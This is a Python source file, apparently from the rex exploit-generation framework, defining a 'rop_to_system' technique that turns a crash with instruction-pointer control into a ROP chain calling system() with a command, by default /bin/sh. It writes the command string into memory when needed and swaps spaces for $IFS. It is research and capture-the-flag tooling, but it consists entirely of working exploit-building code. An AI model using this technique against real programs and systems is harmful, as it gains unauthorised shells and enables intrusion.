import logging

import claripy
from angrop.errors import RopException

from ...vulnerability import Vulnerability
from .. import Exploit, CannotExploit
from ..technique import Technique

l = logging.getLogger("rex.exploit.techniques.rop_to_system")


class RopToSystem(Technique):

    name = "rop_to_system"
    applicable_to = ['unix']

    def find_system_addr(self):
        # find the address of system
        return self._find_func_address("system")

    def check(self):
        if self.rop is None:
            self.check_fail_reason("No ROP available.")
            return False

        # can only exploit ip overwrites
        if not self.crash.one_of([Vulnerability.IP_OVERWRITE, Vulnerability.PARTIAL_IP_OVERWRITE]):
            self.check_fail_reason("Cannot control IP.")
            return False

        # find the address of system
        system_addr = self.find_system_addr()
        if system_addr is None:
            self.check_fail_reason("The function system() could not be found in the binary.")
            return False

        # we should be able to call system in the first place
        state = self.crash.state
        if not state.satisfiable(extra_constraints=[state.regs.pc == system_addr]):
            self.check_fail_reason("The function system() could not be called: system @ %#x" % system_addr)
            return False

        return True

    def write_cmd_str(self, cmd_str):
        # method 1: try to write the cmd_str using ROP
        cmd_addr, cmd_constraint = self._write_with_ROP(cmd_str)
        if cmd_addr:
            return cmd_addr, cmd_constraint

        # method 2: if we control global data, put cmd there, done
        for cmd_addr, cmd_constraint in self._write_global_data(cmd_str):
            return cmd_addr, cmd_constraint

        # method 3: read in the cmd by calling read or gets
        try:
            cmd_addr, cmd_constraint = self._read_in_global_data(cmd_str)
        except CannotExploit as e:
            raise CannotExploit("[%s] cannot call read, %s" % (self.name, e)) from e
        if cmd_addr:
            return cmd_addr, cmd_constraint

        raise CannotExploit("[%s] cannot write in %s" % (self.name, cmd_str))

    def apply(self, cmd=b'/bin/sh', **kwargs):# pylint:disable=arguments-differ
        # find the address of system
        system_addr = self.find_system_addr()
        if system_addr is None:
            raise CannotExploit("[%s] the function system could not be found in the binary" % self.name)

        # just for /bin/sh
        cmd_str = cmd + b'\x00'
        if 0x20 in self.crash._bad_bytes:
            cmd_str = cmd_str.replace(b' ', b'$IFS')

        # look for cmd_str, usually "/bin/sh\x00", if it does not exist in the binary, write it to the memory
        cmd_addr = next(self.crash.project.loader.main_object.memory.find(cmd_str), None)
        if cmd_addr:
            cmd_addr += self.crash.project.loader.main_object.mapped_base

        # if writing the cmd to memory is necessary, don't use null byte
        # or it will cause some troubles in ropchain generation
        cmd_str = self._encode_cmd(cmd)

        if not cmd_addr:
            # write out cmd_str
            cmd_addr, cmd_constraint = self.write_cmd_str(cmd_str)
            # apply the constraint that cmd_str must exist in the binary
            self.crash.state.add_constraints(cmd_constraint)

        # craft the caller chain
        try:
            chain = self.rop.func_call(system_addr, [cmd_addr])
        except RopException as e:
            raise CannotExploit("[%s] cannot craft caller chain" % self.name) from e

        # insert the chain into the binary
        try:
            chain, chain_addr = self._ip_overwrite_with_chain(chain, state=self.crash.state)
        except CannotExploit as e:
            raise CannotExploit("[%s] unable to insert chain" % self.name) from e

        # add the constraint to the state that the chain must exist at the address
        chain_mem = self.crash.state.memory.load(chain_addr, chain.payload_len)
        self.crash.state.add_constraints(chain_mem == claripy.BVV(chain.payload_str()))

        if not self.crash.state.satisfiable():
            raise CannotExploit("[%s] generated exploit is not satisfiable" % self.name)

        return Exploit(self.crash, bypasses_nx=True, bypasses_aslr=True)
